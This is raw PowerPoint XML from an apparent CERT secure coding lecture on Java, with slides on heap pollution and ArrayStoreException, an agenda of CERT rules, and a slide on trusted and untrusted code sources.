              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = list;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>objectArray</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[1] = new Integer(42)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000090"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(String s : list) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>System.out.println</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(s);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000090"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000090"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="AutoShape 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1295400" y="5486400"/>
            <a:ext cx="7467600" cy="752375"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 327"/>
              <a:gd name="adj2" fmla="val -218289"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:schemeClr val="accent2"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent2"/>
          </a:fillRef>
          <a:effectRef idx="3">
            <a:schemeClr val="accent2"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Exception in thread "main" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>java.lang.ArrayStoreException</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>java.lang.Integer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="AutoShape 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3124200" y="2362200"/>
            <a:ext cx="5486400" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 10835"/>
              <a:gd name="adj2" fmla="val -41679"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumMod val="75000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="3">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Arrays have extra runtime checks and are consequently immune to heap pollution</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17757061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pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Secure Coding and SCALe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>SER07-J. Do not use the default serialized form for classes with implementation-defined invariants </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>EXP04-J</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>. Do not pass arguments to certain Java Collections Framework methods that are a different type than the collection parameter type </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>OBJ03-J. Prevent heap pollution </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IDS07-J</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. Do not pass untrusted, unsanitized data to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Runtime.exec()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>method</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Summary</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="79561061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9" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>CERT Secure Coding Standards</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="132100" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="503459" y="1143008"/>
            <a:ext cx="6125941" cy="4876792"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>CERT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Oracle Secure Coding Standard for Java</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Version 1.0 (Java 7) published in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>2011</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Subset </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>applicable to Android development</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Android Annex</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Establishes normative requirements for software </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Evaluated </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>for conformance to the coding </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>standard using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>the Source Code Analysis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Laboratory</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Java Coding Guidelines</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Published Aug 23, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>2013</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Java SE 7 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Platform</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Documents </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>and warn against </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>insecure coding </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>practices that are not conformance issues</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Content Placeholder 4" descr="Java Cover.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="6781800" y="1169504"/>
            <a:ext cx="1818925" cy="2411895"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="Java Coding Guidelines: 75 Recommendations for Reliable and Secure Programs"/>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49112" y="3810000"/>
            <a:ext cx="1769259" cy="23389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3620277"/>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Trusted and Untrusted Code</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a:t>Java programs can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>invoke, contain, or depend on</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The JVM itself </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Locally-developed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>code </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>party </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>code</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Java runtimes &amp; JDK libraries </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Other libraries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Bespoke</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Commercial OTS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Commonly available open-source </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Dynamically loaded code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>System- or user-provided plug-ins</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>System-provided or downloaded libraries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Malicious attacker’s classes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangular Callout 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8305800" y="1447800"/>
            <a:ext cx="2209800" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="92309" tIns="46154" rIns="92309" bIns="46154" numCol="1" rtlCol="0" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="292100" algn="l"/>
                <a:tab pos="571500" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rounded Rectangular Callout 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5486400" y="1524000"/>
            <a:ext cx="2819400" cy="477696"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -137941"/>
              <a:gd name="adj2" fmla="val 6046"/>
              <a:gd name="adj3" fmla="val 16667"/>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2309" tIns="46154" rIns="92309" bIns="46154" numCol="1" rtlCol="0" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Necessarily trusted</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rounded Rectangular Callout 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5562600" y="2057400"/>
            <a:ext cx="3276600" cy="477696"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -97701"/>
              <a:gd name="adj2" fmla="val -34399"/>
              <a:gd name="adj3" fmla="val 16667"/>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2309" tIns="46154" rIns="92309" bIns="46154" numCol="1" rtlCol="0" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Both trusted &amp; untrusted</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rounded Rectangular Callout 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5715000" y="2755089"/>
            <a:ext cx="2743200" cy="750111"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -94555"/>
              <a:gd name="adj2" fmla="val -30084"/>
              <a:gd name="adj3" fmla="val 16667"/>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2309" tIns="46154" rIns="92309" bIns="46154" numCol="1" rtlCol="0" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
